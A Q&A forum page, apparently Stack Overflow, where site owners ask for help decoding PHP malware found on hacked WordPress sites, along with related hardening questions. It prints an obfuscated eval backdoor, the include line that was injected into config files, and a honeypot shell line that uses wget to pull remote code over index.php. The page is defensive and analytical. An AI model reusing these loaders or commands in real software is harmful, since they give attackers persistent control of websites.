Can someone decode this PHP script? [closed] - php

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 4 days ago.
We have a potential malware attack on our website. The virus is adding #include ("\057home\057admi\156/pub\154ic_h\164ml/w\160-inc\154udes\057bloc\153s/po\163t-na\166igat\151on-l\151nk/.\064fa2e\06172.i\143o"); inside many of the files, including wp-config.php and wp-settings.php.
We were able to decode the above code, which is as follows:
Encrypted
#include ("\057home\057admi\156/pub\154ic_h\164ml/w\160-inc\154udes\057bloc\153s/po\163t-na\166igat\151on-l\151nk/.\064fa2e\06172.i\143o");
Decrypted
#include ("/home/admin/public_html/wp-includes/blocks/post-navigation-link/.4fa2e172.ico");
Then we checked this .4fa2e172.ico file and that file contains encrypted PHP code for malware.
Here is the code:
$_gsnter = basename/*jyzi*/(/*w2t4f*/trim/*62jb8*/(/*9k02*/preg_replace/*7lgut*/(/*l0*/rawurldecode/*l*/(/*m3*/"%2F%5C%28.%2A%24%2F"/*48a*/)/*q*/, '', __FILE__/*1*/)/*8y1h*//*hkmzn*/)/*u8qf*//*hwfai*/)/*de*/;
$_76w3qoy = "GRFI%13%01TQ%5B%40%0C%07G%09G%12%13W%04%5ChQA%07%17%0AV%409%02%40%00PCW%0ENJF%24Ol%05W%03XYW%06N%10%1B%5CQ%07%0Cm%06%5EYFK%11%170MF%03%00F%00%11%10%1E%0EXJT%24t%0F%0F%5B%3ABRF%06N%06%1D%5C%5B%14%3E%5E%0AV%10%1E%0E%276%23b%1D%5D%21%5B%0BXhAK%1DKHB%5B%01%3EW%17CX%40%5DNOO%1E%1D%5D%21%5B%0BXhAK%1DKHCU%1E%3EW%1DTTGZ%00%0C%01q%40%0F%0CWB%1D%17%02%07R%23%0A%5CF%09%13m%17TG%5D%5C%1D%0A%01I%1CVH%09%25BRFq%1D%0A%02Kk%0A%08_%0CE%1F%02%07R%0A%09%06%15%02%04T%0C_RV%06K3%27~k%23.~G%18%1EIJ%0C%05%06%40QNCb-ahwa%25AC%0E%16%3A%0F%10L%0AJ%5BHIKNJQ%00%08%5C%00U%1F%15H%00%0F%0AqD%13%15m%06%5EYFK%07%17%1C%0E%13OHI%01TQ%5B%40%0CKHH%5D%0A%04m%15DCmM%06%0D%1BKZ%12%12%12B%1D%17%03%07RG%1F%5BD%0A%19K%09%11%0A%12%09PS%0CM%07%05%03%0BH%03%0E%05%19DWV%1BPKY%0BV%04%1A%03M%0AQX%1CW%05%03W%5C%00%10%09I%05%0C%0DOXFEB%10A%5BJW%05X%09%5BZ%05%15%5B%0A_%17G%5B%1A%11%16AY%03I%16%09ACXW%00JOU%5D%00A%1A%16EE%5EK%07KKBD%12%0BK%0C%18%17%0E%0E%5DJ%14%5CQ%12%14%40%0B%11%15%10%15%14G%17%5DN%03%17B%03%11%0A%12%0C%28%21%2Cjq%20%26z%2C%7B%7C~c%27%2C%3F%7Ff55g3fokt%08%01%0CJQ%00%06Z%0C%5B%5C%5EC%07%0C%1F_F%15%15G%13FOKTYR%5D%1D%00SW%05%5D%08%1C%1D%13KXKYU%0E%12%5D%02SG%12%13I%10%1B%5Ck%15%11%5E%0CE%1F%16V%1A%19%0AXD%00H%09AFVZ%5D%06%04%0D%5E%14%5BAS%17CVKq%0F%0F%06%5E%1CB%16S%0DBXUL%19JT%0AN%07%0D%5C%07CNF%0ETC_%15%10%11%03P%12EYEJI%5EO%0C%16%5DE%5E%15E%5DKGI%5EO%5EF%03%06m%17TG%5EO%0A%06G%0CJ%3D%3FsHkV%1FTYNVr%1F%3ANnXlI%10%02IAM%02%14B%0DB%11%5BN%5B%07R%07%00%0EOB%14Z%08FUPLI%5EO%0AC%07%09A%0AVUBuM%0F%1FZ%5E%1F%08iAKV%5E%40%0B%11%16Z%1FM%3Co%5E%15NEF%18%16%0BT%14%5BA%16%12P_AA%0E%01%1Fu%10%0A%11F%0FH%5Ei%0A%13%02%03%40V%14%18FN%1Ajo%15M%06%1F%5EV%00%04YE%0C%17%16Y%08%0B%1CAS%04%11iA%5DGFD%10%0A4%0AN%07%0D%5C%07CNF%05B%3E2%15%10%1C%00%5E%0BSEKZ%19%0D%05BW%07A%0FE%15%40SF%1A%0C%08LD%3DE%5E%15E%5DKG2G%15OX%08%03%40%1CE%1C%19s4XK_A%04%12U%14ZZ%12%13IKK%5B%5C%0B%16P%07S%17%0E%12IQF%0EHFI%16%1CF_C%5B%0D%19O%10%0AFU%1B%5E%15MSB%07%01%1DW%40%0B%14%40%12FY%12%13IKG%0AM%11%09C%10UM%12%08IRZ%07%14Z%5D%12Q%18%17N%0EAG%0A%5ED%04%07W%0E%11%09%0C%0E%5BJT%0AV%0A%15U%09ZPY%0ETCG%06%10%03%11B%07WRY%0EOC%5C%07%14Z%5D%12S%18%17N%0EM%19%0EBZ%04%13K%11AYXB%0A%02T%0AC%04%03E%11_%40V%0ETCKYV%04%16F%0BFS%12%00I%00%07%5C%1CB%10G%07BPCE%04JTGRFI%16%00AGPH%0C%08O%0F%09FW%06L%11L%16Y%0B%01%18ZZ%11%05%12X%11%13EL%0B%14%1B%40C%02A%1CER_%40%06M%19%0EBZ%04%13K%11%5CB%40Y%1E%0DF%15I%0F%07%12M%15MSB%07%01%1DW%40%16%0FX%09RV%12%0FTCY%1A%1DF%1A%16%12SUEZ%07%14%0B%0E%09FEE%07S%40F%40%1E%07O%00%14%05%09%40M%15U%5EZ%0E%0F%04I_OZO%18%11%40ZG%05%06O%06%10%1C%00%5E%0BSEKZI_O%5D%40%14%0DW%0B%19%13%5E%5E%1D%09%16G%1DOZ%40%00EB%40%40IG%18LV%11%15%5C%12U%0COG%0FCG%0FR%13%0FQ%11XX%5Cq%0C%1B%06%5D%40%15I%15%03X%5BWq%19%16%1BqW%09%0FF%00_CA%09%40J%14HA%08%02F%0C%5EY%12H%00%0F%0AqD%13%15m%06%5EYFK%07%17%1C%06%10%01%00T%11B%5E_DECKTR%0B%11Q%00E%1B%12%0A%08%06%1AY%5D%1C%18BE%0C%17tO%05%10%0A%07OB%14G%09K%5DA%5EI%5EO%0AU%03%14E%0CKNB%0ET%5EO%16%14YA%15%04%16%17%08%0EN%14H%15%10%09%0DH%13PN_%0ETC%2FH%5B%16%04%5CM%15PSH%1D%10%06C%5EJA%16%10D%5BHD%1A%13F%15%5D%00A%1AA%5E%5BHX%08%1A%02%0E%09%5B%5C%12%23P%5BAK%40%18%1DK%40%13%13%5CE%01%0COK%05%10%0AU%5D%00A%1A%0CBhS%5C%1B%02%16%06%10%1C%07_%15RRF%07%40CKTR%0B%11Q%00E%17%0F%0E%00%0E%1FB%5B%02%04%1AAKQ_%5E%0A%06%1B%07%0FB%0A%5D%15%5D%5DY%0ETC%09YF%0F%15WM%15X%5ET%1F%02%16C%18FEH%03%5CGQK%1DJTHW%0A%0EA%00%19%13%5DB%13%15%0EWYOZ%40%00EB%40%40IG%04AD%0A%0BY%5ELJOG%0FCG%0FR%13%0FQ%11XX%5Cq%0C%1B%06%5D%40%15I%15%03X%5BWq%0E%06%1BqW%09%0FF%00_CA%09%40J%14HA%08%02F%0C%5EY%12H%00%0F%0AqS%03%15m%06%5EYFK%07%17%1C%06%10%15%0CB%10XT%5B%07%12G%07AX%0C%04%5EE%0C%17TA%19%06%01%06%10%15%0CB%10XT%5B%02IA%1D%0C%1D%5DE_%03BZGW%0D%08O%13%14%00%13W%04U%1F%16F%06%0F%05KXJAT%0C%5DRAG%13%06G%0AG%0B%11G%0CR%5E%1B%07R%05%0CB%5B%15%04%1AAYX%5ED%0C%0FF%15F%03%15G%17_%17%16C%0F%10%02%5BM%02%0A%09%18LQG%40%0A%17%06AZF%0ES%13SBX%06%40%18%1DK%40%13%13%5CEEE%5BCA%13%1DKS9%13W%15%5DVQKAA%40r%1CHKnA%1E%15%1E%0ENDC%0Ek9%27%7B%29thm%07%40X%12HA%08%02F%0C%5EY%12%5D%1F%0E%18VP%08%17%1AA%40G%5EX%07%0A%0CO%18FE%5D%09KASW%04%13%07GL%12%17BLJ%13JK%06%0A%1BO%14%5BA%10G%0AQ%5D%5CIKKTU%0A%0FP%17HC%0F%1ERCKTU%0A%0FP%17HC%0E%5D%1D%11%03KZNEC%15%5DA%5CG%0A%02F%15%1D%1D%07%5D%17%11%1F%16I%1F%0D%01CY%15%12%0FU%0A%17%16I%1F%0D%01CY%15%12%0E%16EE%5EK%07KKAX%1C%17S%1C%5CGZG%11%17%19%5E%1DFG%14E%15MSB%07%01%1DW%40Z%12F%17%5DR%5C%06M%12%1FBB%08%08Q%04%18%0C%12%0A%0E%15%01%40Y%0B%12AN%1A%1B%12%0A%13%02%03%40V%14%18FN%1A%1EI%0A%11%06%00G%40%07A%1CX%11TZ%5CA%0C%1DJ%1CB%10B%09GY%5BM%088KTU%0A%0FP%17HCo%07I%3DOAF%02I%16%0A%5DMDO%10%0E%1FF%5D%1E%15D%15j%13UX%07%0D%02CG%15%3C%1BL%0AJO%5C%0C%17%1A%5CZFEJ%00%5E%5EFOR%1E%09%5BZ%05%15%5B%0A_%17%5DC%11%01%03K%1CB%10B%09GY%5BM%08OO%0A%5B%0A%1BD%04HZBF%00%1B%1BXDO%1AU%09%5EUSBIG%1F%5BD%0A%19K%09%0AEWZ%1C%11%01%0EG%10%0CE%1DUYD%06%1A%15%02YL%02%0FDM%15FBB%1F%0D%06MUJA%16%0A%5DMDO%10%0E%1FF%5D%1E%15D%15%18%1B%12%0A%19%16%1FBL%1F%0D%1B%5ELQG%40%0A%17%06AZF%0DG%12EVJ%40%10KK_D%0A%17%5C%0CRV%1E%0EM%0C%03TB%07%18_%15Y%5EJZ%1F%13FUS%0A%0EP%04%5D%17%16%5E%1C%13%03VM%0AZ%40%00EB%40%40I%10%19CC%1E%05%5C%13%19DDC%1E%1B%0B%40BNEC%15%5DA%5CG%0A%02C%0E%10%16%14B%09IN%5E%07ECKAX%1C%17S%1C%5CGZG%11%17%19%5E%1D%5D%1CT%10_TFG%06%0DOY%5B%16%00H%11_%1F%1BUM%01%07MB%05%10CE%0C%17rH%00%0F%0AqS%03%15m%06%5EYFK%07%17%1C%06%5B%07%17P%10%5B%1F%1B%07RG%1DVN%11%03G%14%11%0A%12%5D%1D%11%1FAGNEP%0DRAQ_%18OOCPSI%5D%04GUGDAJF%07%0F%0F%07%12M%15EJT%1E%01%1A_%14G%5C%0FEwv~%7D%2CJ%14%0AG%0D%06V%11F%17%0F%0E%1A%16%0D%5D%40%14I%16%07YTDM%18%12C%0E%10%14%19H%12SBC%0EBC%5C%1C%1D%5DEE%1FCF%5BO%10%00O%13%14%26%14%5C%16TE%5BO%05%0A%15K%1C%09%0CJ%07%5DR%1A%5C%08%14%1A%5CX%02%04Q%0AUR%1A%0A%1A%08%08J%40%11H%1EE%5CS%07%06%06%02%19LA%0CI%1BL%18%1E%09S%0C%0F%1CKOB%16H%17%40%5ESW%0ACR%0Eu%14%13S%1C%19%1E%09S%1B%06%1B%5BF%08A%16%12KECG%08%1A%0C%15I%00%14%5C%06E%5E%5D%40I%16%02%5B%5E%02%0DXM%15%40H%5C%18%0A%0EWWO%1A%16%12GVWV%04%12O%13%14%14%00E%10C%5BW%40%0A%0C%0BK%1C%0A%14E%11PO%5CWA%23%1CKF%0F%00%5E%0CKR%1A%0A%1E%19%1D_%5D%07%18QL%1D%17_J%5CK%00OB%04%14XM%18%1E%1B%07RG%0DFW%10%02C%14%11%0A%12n%0F%0A%03Kk%01%04F%3ARX%5CZ%0C%0D%1B%5D%1C%09%00D%07D%5D%1A%07%40XK%5CL%1C%16P%10%40%17%0F%0E%1A%17%1D%5E%5B%15I%16%07YTDM%18%12C%0EY%02T%1A%0APAP%5B%03KF%07%1D%5D%08TE%19%13%40V%13%14%0D%5BEF%40%0FX%11qsb%3A%26FU%10%0E%17%5C%17FME%0ETC%1C%5BV%15%15%40M%15UZM%1F%00%1E_%18FE%40%1DK%40P%5B%18CD%0E%07TH%09AS_QX%0A%12%1E%0E%09F%12F%17nEW%5E%05%02%0CK%1CB%09D%0BC%40HYECKYB%07%04J%08%40%1B%12%0A%0B%0B%0CXW%17%10%1B%5ELR%5E%5D%0C%18KL%5C%05%17Q%14%40%17%0F%0EM%01%07MB%05%10CE%1F%17%10r%07%3F%01%01%1BDA%1CE%5CS%07%06%06%02%19LA%0CI%1BL%11%19%12%0A%1E%15%0EKL%0B%10%09%18qQ%5BB%0C%3C%1F%5B%409%02%5D%0BER%5CZ%1AK%00OB%04%14XM%18%1B%12%0A%0B%0B%0CXW%17%10%1B%5ELQG%40%0A%17%06AZF%0E%5E%0FIPF%06M%1B%09KG%15%0AFI%11%13J%40%05%1A%04%5C%1D%1DEE%1FCF%5BO%10%00O%13%14%11%0EB%04KC%5C%06%40XKYN%14%10%5B%04HTi%0A%11%05%0A%5DG%0D%15oE%0C%17G%5B%1A%11%16AY%03I%16%1D_%5BKE%1BJT%5BY%13%0BV%09%5B%1F%16Y%13%11%1EGU%1F%02%1B%5ELQG%40%0A%17%06AZF%11H%0EIDDJAG%17HQ%15%12Y%11%18L%16Y%13%11%1EGU%1F%02%12X%11%40%5D%5E%08%19%1B%40%1COZG%0BBRF%06M%14%15%5CE%0F%00K%06j%13JH%0C%10%1CE%40%3BH%09%10%5CBXJ%05%09G%0AC%1C%13C%0CPNQ%07R%1E%09%5BZ%05%15%5B%0A_%17AJ%19%05%1F%5EP%0EI%16%1DWRA%5D%02%17R%60a%2A-%1B%1EWX%40K%08%00%07%0E%1C%11%0EB%04KC%5C%06%40C%0E%5D%14B%06D%0B_Z_%5D%1A%0C%08%5BG%02%5C%0CAK%5EKD%0C%06FU%5D%00A%1AAIQW%5D%1A%08%1B%07O%0F%07%12MBC%40M%04%13G%0AL%00%04A%16ZC%1E%0EM%04%19%40Z%0B%0CA%16%5EPG%5D%0DJO%13%09FQ%1B%1ETASBAG%15GM%0C%04WL%0AU%40K%08%08TSI%03%0DA%00JRDO%05KKT%5D%1F%0BW%00%18%0COS%14%05%00%5CQ%07%02ZE%19V%40%5C%08%1A0CQ%14%06WM%15hqa%26%28%26k%18FEm5~df%07I%02%1C%0E%10%09%0CB%1D%5BM%12%13WCK_D%0A%17%5C%0CRV%1BUM%12%1FBB%08%08Q%04%11%0A%12n%1C%0D%1CKF%0F%00%5E%0CKR%1AA%04%1B%0DBQN%14G%16CN%5DC%0CKK_D%0A%17%5C%0CRV%1B%02IG%00CD%1E%0BHL%18%0C%5BHIK%06%5DG%03%15%1AA%40G%5EX%07%0A%0COoA%00YBl%1E%12%08OCK%5EA%16%0DJ%1C%5D%0A%0F%0A%18%13%03XZ%0F%02S%3E%16VY%094J%14GRFI%16%14A%5BD%40%00%00%0Eu%13%07FoE%0C%0A%12%09%00DFU%10%1C%00%5E%0BSEKZI%5EOoF%14%00KM%16GD%09I%5EQ%0Et%16%09B%13TEAG%06%0DG%07%18A%12DB%11%0A%0C%0ENQA%1E%19WF%1EBP%5C%15%0ET%5DO%0AE%16%0DD%0BXTSuN%02%04%09iJH%09%00R_%5D%0E%29%10%0A%5C%5D%07%0D%5B%1FT%1F%16T%08%0F%01LF%1F%15%1B%5ETO%5BZR%1E%0ABG%03%08TE%19%13C%5E%05%15%01GW%07%3A%15%04%16j%12%13TCHK%13O%1AW%13P%5B%1A%0A%18%13%03XZ%0F%02S%3E%16S%15s%40X%12KX%15%04%5B%03%11%1F%16_%19%0F%19%40%5D%05%00iBP%10o%0ET%5EO%09D%0A%14U%0C_%10%1BU%00%05G%0AE%16%0DD%0BXTSuN%10%0E%09iF%5C%0FE%16VVJNJ%14AX%0C%19U%11%19%13C%5E%05%15%01GW%07%3A%15%15%16j%1E%0EM%12%1FBB%08%08Q%04j%10V%094JTSQ%0A%12W%0CW%1F%16_%19%0F%19%40%5D%05%00iBBV%15sI%5ER%0E%13%14%04_B%18LBT%02%1B%1CXPNEC%15%5DA%5CG%0A%024%09DA%3C%1B%5ELJWM%01%0CO%0AE%16%0DD%0BXTSuN%02%04%09i%5D%04J%0CE%1F%1B%15%14%1E%1CJD%00%11B%01Y%1F%1B%15%14i%12";
eval/*k6e7*/(/*z7ir*//*em3a*/(/*ue2lb*/rawurldecode/*pc*/(/*39vut*/$_76w3qoy/*9d0j3*/)/*7fnb*/ ^ substr/*w3qy*/(/*bor*/str_repeat/*s1qg*/(/*o24w*/$_gsnter, /*61m*/(/*rza52*/strlen/*xv*/(/*u*/$_76w3qoy/*xyi*/)/*k5v*//strlen/*jp*/(/*h7g*/$_gsnter/*v28a*/)/*jo*//*t3hn*/)/*e*/ + 1/*y3wp*/)/*di6fn*/, 0, strlen/*2*/(/*6*/$_76w3qoy/*njcet*/)/*4qrm*//*3*/)/*3j*//*j9tdu*/)/*a5v*//*f3w*/)/*atbej*/;
Kindly help us decode this code so we can clean our sites and possibly remove the backdoor as well.
Thank you!
We have tried decoding the above two codes and were successful in decoding the first one. We have scanned our site with different server and WordPress scanners, including CXS Scan, Virus Scanner (cPanel), WordFence, Sucuri, etc.
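Both encodings in this question can be undone statically, without ever executing the sample. The following Python script is an added example, not code from the question or from any answer: it expands the PHP octal escapes used in the injected include line, derives the XOR key the way the loader does (the basename of __FILE__ with anything from "(" onward removed), and applies rawurldecode followed by the same repeating-key XOR that the eval line performs. The sample payload and the xor_encode helper are constructed for the round trip; to inspect the real loader, pass the complete %-encoded string assigned to $_76w3qoy and the real path of the .ico file to xor_decode, then read or write out the returned bytes instead of evaluating them.

```python
import os
import re
from urllib.parse import quote, unquote_to_bytes

# The include argument quoted in the question, with its PHP octal escapes.
INJECTED_INCLUDE_ARG = (r"\057home\057admi\156/pub\154ic_h\164ml/w\160-inc\154udes"
                        r"\057bloc\153s/po\163t-na\166igat\151on-l\151nk/.\064fa2e\06172.i\143o")


def decode_php_octal_escapes(s: str) -> str:
    """Expand the \\ooo escapes PHP accepts inside double-quoted strings."""
    # PHP reads at most three octal digits per escape, so "\06172" is "\061" + "72".
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), s)


def derive_key(loader_path: str) -> bytes:
    """Mirror basename(trim(preg_replace('/\\(.*$/', '', __FILE__))).

    The regex strips a trailing "(12) : eval()'d code" suffix that PHP appends
    to __FILE__ inside eval'd code, so the key is always the bare file name.
    """
    stripped = re.sub(r"\(.*$", "", loader_path)
    return os.path.basename(stripped.strip()).encode()


def xor_decode(encoded: str, key: bytes) -> bytes:
    """rawurldecode($blob) ^ substr(str_repeat($key, ...), 0, strlen($blob)).

    PHP's string XOR works byte by byte and the substr() trims the repeated
    key to the blob's length, so this is a plain repeating-key XOR. Working
    on bytes keeps any high bytes in the decoded PHP intact.
    """
    data = unquote_to_bytes(encoded)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_encode(plaintext: bytes, key: bytes) -> str:
    """Inverse of xor_decode (constructed helper, used only to build the sample)."""
    xored = bytes(b ^ key[i % len(key)] for i, b in enumerate(plaintext))
    return quote(xored, safe="")  # same escaping rules as PHP rawurlencode()


if __name__ == "__main__":
    loader = decode_php_octal_escapes(INJECTED_INCLUDE_ARG)
    print("include target:", loader)
    key = derive_key(loader)
    print("XOR key:", key)
    # Constructed sample payload, round-tripped through the loader's scheme.
    sample = b"<?php echo 'constructed sample payload'; ?>"
    blob = xor_encode(sample, key)
    print("encoded sample:", blob[:60], "...")
    print("decoded sample:", xor_decode(blob, key))
```

The key is the loader's own file name, so the blob only decodes correctly against the path the include line points at; renaming the .ico file while analysing it changes the key. Nothing here calls eval: the decoded bytes are returned for reading, which is all that is needed to see what the backdoor does and which other files it touches.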

Related

PHP does not work after certification lets encrypt [closed]

Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 2 years ago.
After I finished setting up TLS with Let's Encrypt, my site under WordPress is only displayed in ugly HTML.
My architecture is the following:
(reverse proxy) => (nat box)=>(reverse proxy2)=>(web server)
I obviously changed the WordPress configuration for https.
Do you have any idea where this might be coming from?
You could try https://wordpress.org/plugins/wp-letsencrypt-ssl/#description. The plugin could force SSL/HTTPS, fixing insecure content & mixed content issues easily.
Access your site via a browser and check the console. You will probably see resources (probably your CSS) that are being prevented from loading because they are 'http' requests in an 'https' connection.
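To make the console check from the answer repeatable, here is an added Python example (not from the question or the answers) that parses a page's HTML and lists the sub-resources a browser would fetch over plain http on an https page. The HTML and URLs are constructed for the demonstration; run it on the saved source of your own WordPress page together with that page's URL.

```python
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urljoin, urlsplit

# (tag, attribute) pairs through which the browser fetches or submits to a URL.
RESOURCE_ATTRS = {
    ("script", "src"), ("img", "src"), ("iframe", "src"), ("source", "src"),
    ("video", "src"), ("audio", "src"), ("link", "href"), ("form", "action"),
}


class MixedContentFinder(HTMLParser):
    """Collect (tag, attribute, absolute URL) for every http:// resource reference."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.findings: List[Tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        # Only <link> elements that load a stylesheet fetch a sub-resource;
        # rel="canonical" and similar are metadata and never blocked.
        if tag == "link" and "stylesheet" not in (attrs.get("rel") or "").lower():
            return
        for name, value in attrs.items():
            if (tag, name) in RESOURCE_ATTRS and value:
                # Resolve relative and protocol-relative ("//cdn/...") URLs
                # against the page so they inherit its https scheme.
                absolute = urljoin(self.page_url, value.strip())
                if urlsplit(absolute).scheme == "http":
                    self.findings.append((tag, name, absolute))


def find_mixed_content(html: str, page_url: str) -> List[Tuple[str, str, str]]:
    parser = MixedContentFinder(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: an https page whose theme still emits two http:// URLs.
SAMPLE_PAGE_URL = "https://example.com/"
SAMPLE_HTML = """<!doctype html><html><head>
<link rel="canonical" href="http://example.com/">
<link rel="stylesheet" href="http://example.com/wp-content/themes/demo/style.css">
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="//cdn.example.net/lib.js"></script>
</head><body>
<img src="http://example.com/wp-content/uploads/logo.png" alt="">
<form action="https://example.com/wp-login.php"></form>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, url in find_mixed_content(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print(f"insecure {tag}[{attr}] -> {url}")
```

Relative and protocol-relative URLs inherit the page's https scheme and are not reported; only absolute http:// references are. Behind a TLS-terminating proxy chain like the one described, such absolute URLs often appear because WordPress sees a plain-HTTP request arriving from the last proxy; this check shows which resources are affected, not why they were generated.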

Can website visitors see server-side source code? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 6 years ago.
I want to make sure visitors to my site can't see the PHP code that's generating the page. Here is a reference: http://may.edu.np/tmp/
Can anyone explain to me how server-side scripts are interpreted and how the result is delivered to the end user?
If I understand your question correctly, no one should be able to access your source code so long as they don't have access to the server. When a browser makes a request for a .php file to the server, the server knows that it must first interpret the script and then send the output from your echo statements and/or inline HTML. As far as I know, there's no way for the user to "trick" the server into sending it as plain text, so I wouldn't worry about that. Also, as long as you disable error reporting, no one should even know you're running php, as there's no ".php" in the URL. Hope this helps :)

Deobfuscate this PHP shell attack [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 7 years ago.
One of my honeypot systems has a pretty interesting PHP shell on it. I've been trying to decode it, but I'm not having any luck getting the contents of the gzinflated, b64-encoded part of the script.
Maybe someone with a little more experience with deobfuscating could take a look at it?
Here's the original pastebin they used to download to my honeypot:
http://pastebin.com/1w59Ew9S
<?php if($_SERVER["REMOTE_ADDR"] =='ATTACKER_IP') {#system('wget http://pastebin.com/raw.php?i=1w59Ew9S -O /www/index.php;ls -la /www/index.php');exit; }?>
I attempted to deobfuscate it myself by printing variables in different places, but I can't for the life of me get the contents to print out.
Here's my attempt at making it a little bit more human readable:
http://pastebin.com/BRbyVzyZ

can people read the content of an online php file? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 8 years ago.
My PHP file online has permission settings 444 ('readable' for everyone).
When I open the file in Firefox, it correctly shows only the output of the file (meaning things that are echoed or printed).
I want people to NOT EVER see the inside of the php file because it shows sensitive information. So - are there some people that are able to look into the inside of the php file?
Unless someone has access to the server then generally no.
There are ways to purposely make the source code visible however.
http://php.net/manual/en/function.show-source.php

Prevent hacking my website from hackers [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 8 years ago.
Please help, anyone. This is the 4th time this has happened to us: someone is hacking all our websites and replacing our index file with their new file.
This time it was hacked by XcoDerz Security (https://www.facebook.com/Th3CoderzBoat/timeline?ref=page_internal). Please give me the solution to avoid this type of hacking.
Basically they are replacing my index file with their new index file with some new content.
First of all, change your FTP details. Then check your FTP files for any JS that could be interrogated, or file upload forms, and remove them.
You could try contacting your Web Hosting provider and inform them of what's happening, and supply them with IP addresses if you have them. They may be able to put things in place from their end to block these hackers.
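A simple integrity baseline catches the replacement described here the next time it happens. The following Python script is an added example (not from the question or the answers): it records SHA-256 hashes of the files attackers most often overwrite (index files, .htaccess and wp-config.php) under a document root, and later reports which of them changed, appeared or disappeared. The demo() function builds a throwaway directory with constructed files to show the output; the watched file names and paths are assumptions to adjust for your site.

```python
import hashlib
import json
import os
import tempfile
from typing import Dict, Iterable, List

# Assumed list of files worth watching; adjust for your site.
WATCHED_NAMES = ("index.php", "index.html", ".htaccess", "wp-config.php")


def hash_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def snapshot(root: str, names: Iterable[str] = WATCHED_NAMES) -> Dict[str, str]:
    """Map each watched file below root (relative, '/'-separated) to its SHA-256."""
    wanted = set(names)
    result: Dict[str, str] = {}
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if filename in wanted:
                path = os.path.join(dirpath, filename)
                with open(path, "rb") as fh:
                    key = os.path.relpath(path, root).replace(os.sep, "/")
                    result[key] = hash_bytes(fh.read())
    return result


def diff_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files whose content changed, new watched files, and missing files."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def save_baseline(snap: Dict[str, str], path: str) -> None:
    with open(path, "w") as fh:
        json.dump(snap, fh, indent=2, sort_keys=True)


def load_baseline(path: str) -> Dict[str, str]:
    with open(path) as fh:
        return json.load(fh)


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a site, then simulate a replaced index file."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        def write(rel: str, text: str) -> None:
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(text)

        write("index.php", "<?php /* constructed original index */ ?>")
        write("wp-config.php", "<?php /* constructed config */ ?>")
        baseline_file = os.path.join(store, "baseline.json")  # kept outside the web root
        save_baseline(snapshot(root), baseline_file)

        # Later: the index file is overwritten and a new index appears in a subfolder.
        write("index.php", "<html>constructed defacement page</html>")
        write("blog/index.html", "<html>constructed dropped file</html>")
        return diff_snapshots(load_baseline(baseline_file), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the baseline file outside the web root (otherwise it is just as replaceable as the index file) and run the comparison from cron so the next replacement is noticed in minutes rather than when a visitor reports it.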
